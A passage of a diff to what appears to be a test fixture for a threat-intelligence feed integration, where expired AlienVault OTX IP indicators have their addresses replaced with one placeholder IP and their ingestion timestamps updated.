14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"US\"},{\"attribute_id\":3,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1885,\"indicator_id\":337,\"name\":\"Description\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Malicious Host\"},{\"attribute_id\":6,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1886,\"indicator_id\":337,\"name\":\"AlienVault Revision\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":8,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1887,\"indicator_id\":337,\"name\":\"AlienVault Reliability\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"4\"},{\"attribute_id\":5,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1888,\"indicator_id\":337,\"name\":\"City\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Sacramento\"}],\"class\":\"network\",\"created_at\":\"2020-09-11 14:35:51\",\"expired_at\":\"2020-11-15 00:00:02\",\"expires_calculated_at\":\"2020-10-15 14:40:03\",\"hash\":\"73c98d43519990c841a5d022546fedd4\",\"id\":337,\"published_at\":\"2020-09-11 14:35:51\",\"score\":4,\"sources\":[{\"created_at\":\"2020-09-11 14:35:53\",\"creator_source_id\":12,\"id\":337,\"indicator_id\":337,\"indicator_status_id\":2,\"indicator_type_id\":15,\"name\":\"AlienVault OTX\",\"published_at\":\"2020-09-11 14:35:53\",\"reference_id\":1,\"source_expire_days\":\"30\",\"source_id\":12,\"source_score\":1,\"source_type\":\"connectors\",\"updated_at\":\"2020-10-15 14:36:00\"}],\"status\":{\"description\":\"No longer poses a serious threat.\",\"id\":2,\"name\":\"Expired\"},\"status_id\":2,\"touched_at\":\"2021-06-07 19:47:27\",\"type\":{\"class\":\"network\",\"id\":15,\"name\":\"IP Address\"},\"type_id\":15,\"updated_at\":\"2020-11-15 00:00:02\",\"value\":\"89.160.20.156\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -129,19 +129,19 @@ }, "expires_calculated_at": "2020-10-15T14:40:03.000Z", "published_at": "2020-09-11T14:35:51.000Z", - "indicator_value": "69.42.81.68", + "indicator_value": "89.160.20.156", "status": "Expired" }, "threat": { "indicator": { "type": "ipv4-addr", "confidence": "Low", - "ip": "69.42.81.68" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-26T07:49:05.368836225Z", - "original": "{\"adversaries\":[],\"attributes\":[{\"attribute_id\":7,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1889,\"indicator_id\":338,\"name\":\"AlienVault Threat Level\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"2\"},{\"attribute_id\":4,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1890,\"indicator_id\":338,\"name\":\"Country\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"US\"},{\"attribute_id\":3,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1891,\"indicator_id\":338,\"name\":\"Description\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Malicious Host\"},{\"attribute_id\":6,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1892,\"indicator_id\":338,\"name\":\"AlienVault Revision\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":5,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1893,\"indicator_id\":338,\"name\":\"City\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"New York\"},{\"attribute_id\":8,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1894,\"indicator_id\":338,\"name\":\"AlienVault Reliability\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"4\"}],\"class\":\"network\",\"created_at\":\"2020-09-11 14:35:51\",\"expired_at\":\"2020-11-15 00:00:02\",\"expires_calculated_at\":\"2020-10-15 14:40:03\",\"hash\":\"a9c6773919112627495d87c51fe89b15\",\"id\":338,\"published_at\":\"2020-09-11 14:35:51\",\"score\":4,\"sources\":[{\"created_at\":\"2020-09-11 14:35:53\",\"creator_source_id\":12,\"id\":338,\"indicator_id\":338,\"indicator_status_id\":2,\"indicator_type_id\":15,\"name\":\"AlienVault OTX\",\"published_at\":\"2020-09-11 14:35:53\",\"reference_id\":1,\"source_expire_days\":\"30\",\"source_id\":12,\"source_score\":1,\"source_type\":\"connectors\",\"updated_at\":\"2020-10-15 14:36:00\"}],\"status\":{\"description\":\"No longer poses a serious threat.\",\"id\":2,\"name\":\"Expired\"},\"status_id\":2,\"touched_at\":\"2021-06-07 19:47:27\",\"type\":{\"class\":\"network\",\"id\":15,\"name\":\"IP Address\"},\"type_id\":15,\"updated_at\":\"2020-11-15 00:00:02\",\"value\":\"69.42.81.68\"}", + "ingested": "2021-12-09T13:49:13.119404400Z", + "original": "{\"adversaries\":[],\"attributes\":[{\"attribute_id\":7,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1889,\"indicator_id\":338,\"name\":\"AlienVault Threat Level\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"2\"},{\"attribute_id\":4,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1890,\"indicator_id\":338,\"name\":\"Country\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"US\"},{\"attribute_id\":3,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1891,\"indicator_id\":338,\"name\":\"Description\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Malicious Host\"},{\"attribute_id\":6,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1892,\"indicator_id\":338,\"name\":\"AlienVault Revision\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":5,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1893,\"indicator_id\":338,\"name\":\"City\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"New York\"},{\"attribute_id\":8,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1894,\"indicator_id\":338,\"name\":\"AlienVault Reliability\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"4\"}],\"class\":\"network\",\"created_at\":\"2020-09-11 14:35:51\",\"expired_at\":\"2020-11-15 00:00:02\",\"expires_calculated_at\":\"2020-10-15 14:40:03\",\"hash\":\"a9c6773919112627495d87c51fe89b15\",\"id\":338,\"published_at\":\"2020-09-11 14:35:51\",\"score\":4,\"sources\":[{\"created_at\":\"2020-09-11 14:35:53\",\"creator_source_id\":12,\"id\":338,\"indicator_id\":338,\"indicator_status_id\":2,\"indicator_type_id\":15,\"name\":\"AlienVault OTX\",\"published_at\":\"2020-09-11 14:35:53\",\"reference_id\":1,\"source_expire_days\":\"30\",\"source_id\":12,\"source_score\":1,\"source_type\":\"connectors\",\"updated_at\":\"2020-10-15 14:36:00\"}],\"status\":{\"description\":\"No longer poses a serious threat.\",\"id\":2,\"name\":\"Expired\"},\"status_id\":2,\"touched_at\":\"2021-06-07 19:47:27\",\"type\":{\"class\":\"network\",\"id\":15,\"name\":\"IP Address\"},\"type_id\":15,\"updated_at\":\"2020-11-15 00:00:02\",\"value\":\"89.160.20.156\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -173,19 +173,19 @@ }, "expires_calculated_at": "2020-10-15T14:40:02.000Z", "published_at": "2020-09-11T14:35:41.000Z", - "indicator_value": "37.17.250.101", + "indicator_value": "89.160.20.156", "status": "Expired" }, "threat": { "indicator": { "type": "ipv4-addr", "confidence": "Low", - "ip": "37.17.250.101" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-26T07:49:05.368842246Z", - "original": "{\"adversaries\":[],\"attributes\":[{\"attribute_id\":8,\"created_at\":\"2020-09-11 14:35:43\",\"id\":184,\"indicator_id\":34,\"name\":\"AlienVault Reliability\",\"touched_at\":\"2020-10-15 14:35:49\",\"updated_at\":\"2020-10-15 14:35:49\",\"value\":\"4\"},{\"attribute_id\":6,\"created_at\":\"2020-09-11 14:35:43\",\"id\":185,\"indicator_id\":34,\"name\":\"AlienVault Revision\",\"touched_at\":\"2020-10-15 14:35:49\",\"updated_at\":\"2020-10-15 14:35:49\",\"value\":\"3\"},{\"attribute_id\":3,\"created_at\":\"2020-09-11 14:35:43\",\"id\":186,\"indicator_id\":34,\"name\":\"Description\",\"touched_at\":\"2020-10-15 14:35:49\",\"updated_at\":\"2020-10-15 14:35:49\",\"value\":\"Malicious Host\"},{\"attribute_id\":7,\"created_at\":\"2020-09-11 14:35:43\",\"id\":187,\"indicator_id\":34,\"name\":\"AlienVault Threat Level\",\"touched_at\":\"2020-10-15 14:35:49\",\"updated_at\":\"2020-10-15 14:35:49\",\"value\":\"2\"}],\"class\":\"network\",\"created_at\":\"2020-09-11 14:35:41\",\"expired_at\":\"2020-11-15 00:00:02\",\"expires_calculated_at\":\"2020-10-15 14:40:02\",\"hash\":\"56f3cb07a9055f52947bb4c4244f762d\",\"id\":34,\"published_at\":\"2020-09-11 14:35:41\",\"score\":4,\"sources\":[{\"created_at\":\"2020-09-11 14:35:43\",\"creator_source_id\":12,\"id\":34,\"indicator_id\":34,\"indicator_status_id\":2,\"indicator_type_id\":15,\"name\":\"AlienVault OTX\",\"published_at\":\"2020-09-11 14:35:43\",\"reference_id\":1,\"source_expire_days\":\"30\",\"source_id\":12,\"source_score\":1,\"source_type\":\"connectors\",\"updated_at\":\"2020-10-15 14:35:49\"}],\"status\":{\"description\":\"No longer poses a serious threat.\",\"id\":2,\"name\":\"Expired\"},\"status_id\":2,\"touched_at\":\"2021-06-07 19:47:27\",\"type\":{\"class\":\"network\",\"id\":15,\"name\":\"IP Address\"},\"type_id\":15,\"updated_at\":\"2020-11-15 00:00:02\",\"value\":\"37.17.250.101\"}", + "ingested": "2021-12-09T13:49:13.119414900Z", + "original": "{\"adversaries\":[],\"attributes\":[{\"attribute_id\":8,\"created_at\":\"2020-09-11 14:35:43\",\"id\":184,\"indicator_id\":34,\"name\":\"AlienVault Reliability\",\"touched_at\":\"2020-10-15 14:35:49\",\"updated_at\":\"2020-10-15 14:35:49\",\"value\":\"4\"},{\"attribute_id\":6,\"created_at\":\"2020-09-11 14:35:43\",\"id\":185,\"indicator_id\":34,\"name\":\"AlienVault Revision\",\"touched_at\":\"2020-10-15 14:35:49\",\"updated_at\":\"2020-10-15 14:35:49\",\"value\":\"3\"},{\"attribute_id\":3,\"created_at\":\"2020-09-11 14:35:43\",\"id\":186,\"indicator_id\":34,\"name\":\"Description\",\"touched_at\":\"2020-10-15 14:35:49\",\"updated_at\":\"2020-10-15 14:35:49\",\"value\":\"Malicious Host\"},{\"attribute_id\":7,\"created_at\":\"2020-09-11 14:35:43\",\"id\":187,\"indicator_id\":34,\"name\":\"AlienVault Threat Level\",\"touched_at\":\"2020-10-15 14:35:49\",\"updated_at\":\"2020-10-15 14:35:49\",\"value\":\"2\"}],\"class\":\"network\",\"created_at\":\"2020-09-11 14:35:41\",\"expired_at\":\"2020-11-15 00:00:02\",\"expires_calculated_at\":\"2020-10-15 14:40:02\",\"hash\":\"56f3cb07a9055f52947bb4c4244f762d\",\"id\":34,\"published_at\":\"2020-09-11 14:35:41\",\"score\":4,\"sources\":[{\"created_at\":\"2020-09-11 14:35:43\",\"creator_source_id\":12,\"id\":34,\"indicator_id\":34,\"indicator_status_id\":2,\"indicator_type_id\":15,\"name\":\"AlienVault OTX\",\"published_at\":\"2020-09-11 14:35:43\",\"reference_id\":1,\"source_expire_days\":\"30\",\"source_id\":12,\"source_score\":1,\"source_type\":\"connectors\",\"updated_at\":\"2020-10-15 14:35:49\"}],\"status\":{\"description\":\"No longer poses a serious threat.\",\"id\":2,\"name\":\"Expired\"},\"status_id\":2,\"touched_at\":\"2021-06-07 19:47:27\",\"type\":{\"class\":\"network\",\"id\":15,\"name\":\"IP Address\"},\"type_id\":15,\"updated_at\":\"2020-11-15 00:00:02\",\"value\":\"89.160.20.156\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -223,19 +223,19 @@ }, "expires_calculated_at": "2020-10-15T14:40:03.000Z", "published_at": "2020-09-11T14:35:51.000Z", - "indicator_value": "69.94.129.203", + "indicator_value": "89.160.20.156", "status": "Expired" }, "threat": { "indicator": { "type": "ipv4-addr", "confidence": "Low", - "ip": "69.94.129.203" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-26T07:49:05.368847456Z", - "original": "{\"adversaries\":[],\"attributes\":[{\"attribute_id\":7,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1901,\"indicator_id\":340,\"name\":\"AlienVault Threat Level\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"2\"},{\"attribute_id\":4,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1902,\"indicator_id\":340,\"name\":\"Country\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"US\"},{\"attribute_id\":3,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1903,\"indicator_id\":340,\"name\":\"Description\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Malicious Host\"},{\"attribute_id\":6,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1904,\"indicator_id\":340,\"name\":\"AlienVault Revision\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":8,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1905,\"indicator_id\":340,\"name\":\"AlienVault Reliability\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"4\"},{\"attribute_id\":5,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1906,\"indicator_id\":340,\"name\":\"City\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Sacramento\"}],\"class\":\"network\",\"created_at\":\"2020-09-11 14:35:51\",\"expired_at\":\"2020-11-15 00:00:02\",\"expires_calculated_at\":\"2020-10-15 14:40:03\",\"hash\":\"97624a37200db6ba0bcfce8c9c28f527\",\"id\":340,\"published_at\":\"2020-09-11 14:35:51\",\"score\":4,\"sources\":[{\"created_at\":\"2020-09-11 14:35:53\",\"creator_source_id\":12,\"id\":340,\"indicator_id\":340,\"indicator_status_id\":2,\"indicator_type_id\":15,\"name\":\"AlienVault OTX\",\"published_at\":\"2020-09-11 14:35:53\",\"reference_id\":1,\"source_expire_days\":\"30\",\"source_id\":12,\"source_score\":1,\"source_type\":\"connectors\",\"updated_at\":\"2020-10-15 14:36:00\"}],\"status\":{\"description\":\"No longer poses a serious threat.\",\"id\":2,\"name\":\"Expired\"},\"status_id\":2,\"touched_at\":\"2021-06-07 19:47:27\",\"type\":{\"class\":\"network\",\"id\":15,\"name\":\"IP Address\"},\"type_id\":15,\"updated_at\":\"2020-11-15 00:00:02\",\"value\":\"69.94.129.203\"}", + "ingested": "2021-12-09T13:49:13.119512900Z", + "original": "{\"adversaries\":[],\"attributes\":[{\"attribute_id\":7,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1901,\"indicator_id\":340,\"name\":\"AlienVault Threat Level\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"2\"},{\"attribute_id\":4,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1902,\"indicator_id\":340,\"name\":\"Country\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"US\"},{\"attribute_id\":3,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1903,\"indicator_id\":340,\"name\":\"Description\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Malicious Host\"},{\"attribute_id\":6,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1904,\"indicator_id\":340,\"name\":\"AlienVault Revision\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":8,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1905,\"indicator_id\":340,\"name\":\"AlienVault Reliability\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"4\"},{\"attribute_id\":5,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1906,\"indicator_id\":340,\"name\":\"City\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Sacramento\"}],\"class\":\"network\",\"created_at\":\"2020-09-11 14:35:51\",\"expired_at\":\"2020-11-15 00:00:02\",\"expires_calculated_at\":\"2020-10-15 14:40:03\",\"hash\":\"97624a37200db6ba0bcfce8c9c28f527\",\"id\":340,\"published_at\":\"2020-09-11 14:35:51\",\"score\":4,\"sources\":[{\"created_at\":\"2020-09-11 14:35:53\",\"creator_source_id\":12,\"id\":340,\"indicator_id\":340,\"indicator_status_id\":2,\"indicator_type_id\":15,\"name\":\"AlienVault OTX\",\"published_at\":\"2020-09-11 14:35:53\",\"reference_id\":1,\"source_expire_days\":\"30\",\"source_id\":12,\"source_score\":1,\"source_type\":\"connectors\",\"updated_at\":\"2020-10-15 14:36:00\"}],\"status\":{\"description\":\"No longer poses a serious threat.\",\"id\":2,\"name\":\"Expired\"},\"status_id\":2,\"touched_at\":\"2021-06-07 19:47:27\",\"type\":{\"class\":\"network\",\"id\":15,\"name\":\"IP Address\"},\"type_id\":15,\"updated_at\":\"2020-11-15 00:00:02\",\"value\":\"89.160.20.156\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -273,7 +273,7 @@ }, "expires_calculated_at": "2020-10-15T14:40:03.000Z", "published_at": "2020-09-11T14:35:51.000Z", - "indicator_value": "69.216.117.22", + "indicator_value": "89.160.20.156", "status": "Expired" }, "threat": { @@ -288,12 +288,12 @@ "testprovider" ], "confidence": "Low", - "ip": "69.216.117.22" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-26T07:49:05.368852125Z", - "original": "{\"adversaries\":[],\"attributes\":[{\"attribute_id\":4,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1907,\"indicator_id\":341,\"name\":\"Country\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"US\"},{\"attribute_id\":3,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1908,\"indicator_id\":341,\"name\":\"Description\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Malicious Host\"},{\"attribute_id\":6,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1909,\"indicator_id\":341,\"name\":\"AlienVault Revision\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":5,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1910,\"indicator_id\":341,\"name\":\"City\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Houston\"},{\"attribute_id\":7,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1911,\"indicator_id\":341,\"name\":\"AlienVault Threat Level\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":8,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1912,\"indicator_id\":341,\"name\":\"AlienVault Reliability\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"4\"}],\"class\":\"network\",\"created_at\":\"2020-09-11 14:35:51\",\"expired_at\":\"2020-11-15 00:00:02\",\"expires_calculated_at\":\"2020-10-15 14:40:03\",\"hash\":\"56a1917632c03f230c5645f432e71495\",\"id\":341,\"published_at\":\"2020-09-11 14:35:51\",\"score\":4,\"sources\":[{\"created_at\":\"2020-09-11 14:35:53\",\"creator_source_id\":12,\"id\":341,\"indicator_id\":341,\"indicator_status_id\":2,\"indicator_type_id\":15,\"name\":\"AlienVault OTX\",\"published_at\":\"2020-09-11 14:35:53\",\"reference_id\":1,\"source_expire_days\":\"30\",\"source_id\":12,\"source_score\":1,\"source_type\":\"connectors\",\"updated_at\":\"2020-10-15 14:36:00\",\"provider\":\"testprovider\",\"tlp_name\":\"testtlp\"}],\"status\":{\"description\":\"No longer poses a serious threat.\",\"id\":2,\"name\":\"Expired\"},\"status_id\":2,\"touched_at\":\"2021-06-07 19:47:27\",\"type\":{\"class\":\"network\",\"id\":15,\"name\":\"IP Address\"},\"type_id\":15,\"updated_at\":\"2020-11-15 00:00:02\",\"value\":\"69.216.117.22\"}", + "ingested": "2021-12-09T13:49:13.119539400Z", + "original": "{\"adversaries\":[],\"attributes\":[{\"attribute_id\":4,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1907,\"indicator_id\":341,\"name\":\"Country\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"US\"},{\"attribute_id\":3,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1908,\"indicator_id\":341,\"name\":\"Description\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Malicious Host\"},{\"attribute_id\":6,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1909,\"indicator_id\":341,\"name\":\"AlienVault Revision\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":5,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1910,\"indicator_id\":341,\"name\":\"City\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Houston\"},{\"attribute_id\":7,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1911,\"indicator_id\":341,\"name\":\"AlienVault Threat Level\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":8,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1912,\"indicator_id\":341,\"name\":\"AlienVault Reliability\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"4\"}],\"class\":\"network\",\"created_at\":\"2020-09-11 14:35:51\",\"expired_at\":\"2020-11-15 00:00:02\",\"expires_calculated_at\":\"2020-10-15 14:40:03\",\"hash\":\"56a1917632c03f230c5645f432e71495\",\"id\":341,\"published_at\":\"2020-09-11 14:35:51\",\"score\":4,\"sources\":[{\"created_at\":\"2020-09-11 14:35:53\",\"creator_source_id\":12,\"id\":341,\"indicator_id\":341,\"indicator_status_id\":2,\"indicator_type_id\":15,\"name\":\"AlienVault OTX\",\"published_at\":\"2020-09-11 14:35:53\",\"reference_id\":1,\"source_expire_days\":\"30\",\"source_id\":12,\"source_score\":1,\"source_type\":\"connectors\",\"updated_at\":\"2020-10-15 14:36:00\",\"provider\":\"testprovider\",\"tlp_name\":\"testtlp\"}],\"status\":{\"description\":\"No longer poses a serious threat.\",\"id\":2,\"name\":\"Expired\"},\"status_id\":2,\"touched_at\":\"2021-06-07 19:47:27\",\"type\":{\"class\":\"network\",\"id\":15,\"name\":\"IP Address\"},\"type_id\":15,\"updated_at\":\"2020-11-15 00:00:02\",\"value\":\"89.160.20.156\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -331,19 +331,19 @@ }, "expires_calculated_at": "2020-10-15T14:40:03.000Z", "published_at": "2020-09-11T14:35:51.000Z", - "indicator_value": "69.80.70.115", + "indicator_value": "89.160.20.156", "status": "Expired" }, "threat": { "indicator": { "type": "ipv4-addr", "confidence": "Low", - "ip": "69.80.70.115" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-26T07:49:05.368856844Z", - "original": "{\"adversaries\":[],\"attributes\":[{\"attribute_id\":7,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1913,\"indicator_id\":342,\"name\":\"AlienVault Threat Level\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"2\"},{\"attribute_id\":5,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1914,\"indicator_id\":342,\"name\":\"City\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Fort Lauderdale\"},{\"attribute_id\":4,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1915,\"indicator_id\":342,\"name\":\"Country\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"US\"},{\"attribute_id\":3,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1916,\"indicator_id\":342,\"name\":\"Description\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Malicious Host\"},{\"attribute_id\":6,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1917,\"indicator_id\":342,\"name\":\"AlienVault Revision\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":8,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1918,\"indicator_id\":342,\"name\":\"AlienVault Reliability\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"4\"}],\"class\":\"network\",\"created_at\":\"2020-09-11 14:35:51\",\"expired_at\":\"2020-11-15 00:00:02\",\"expires_calculated_at\":\"2020-10-15 14:40:03\",\"hash\":\"6de45834c2a81597b59a91ead4fbdf59\",\"id\":342,\"published_at\":\"2020-09-11 14:35:51\",\"score\":4,\"sources\":[{\"created_at\":\"2020-09-11 14:35:53\",\"creator_source_id\":12,\"id\":342,\"indicator_id\":342,\"indicator_status_id\":2,\"indicator_type_id\":15,\"name\":\"AlienVault OTX\",\"published_at\":\"2020-09-11 14:35:53\",\"reference_id\":1,\"source_expire_days\":\"30\",\"source_id\":12,\"source_score\":1,\"source_type\":\"connectors\",\"updated_at\":\"2020-10-15 14:36:00\"}],\"status\":{\"description\":\"No longer poses a serious threat.\",\"id\":2,\"name\":\"Expired\"},\"status_id\":2,\"touched_at\":\"2021-06-07 19:47:27\",\"type\":{\"class\":\"network\",\"id\":15,\"name\":\"IP Address\"},\"type_id\":15,\"updated_at\":\"2020-11-15 00:00:02\",\"value\":\"69.80.70.115\"}", + "ingested": "2021-12-09T13:49:13.119543200Z", + "original": "{\"adversaries\":[],\"attributes\":[{\"attribute_id\":7,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1913,\"indicator_id\":342,\"name\":\"AlienVault Threat Level\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"2\"},{\"attribute_id\":5,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1914,\"indicator_id\":342,\"name\":\"City\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Fort Lauderdale\"},{\"attribute_id\":4,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1915,\"indicator_id\":342,\"name\":\"Country\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"US\"},{\"attribute_id\":3,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1916,\"indicator_id\":342,\"name\":\"Description\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Malicious Host\"},{\"attribute_id\":6,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1917,\"indicator_id\":342,\"name\":\"AlienVault Revision\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":8,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1918,\"indicator_id\":342,\"name\":\"AlienVault Reliability\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"4\"}],\"class\":\"network\",\"created_at\":\"2020-09-11 14:35:51\",\"expired_at\":\"2020-11-15 00:00:02\",\"expires_calculated_at\":\"2020-10-15 14:40:03\",\"hash\":\"6de45834c2a81597b59a91ead4fbdf59\",\"id\":342,\"published_at\":\"2020-09-11 14:35:51\",\"score\":4,\"sources\":[{\"created_at\":\"2020-09-11 14:35:53\",\"creator_source_id\":12,\"id\":342,\"indicator_id\":342,\"indicator_status_id\":2,\"indicator_type_id\":15,\"name\":\"AlienVault OTX\",\"published_at\":\"2020-09-11 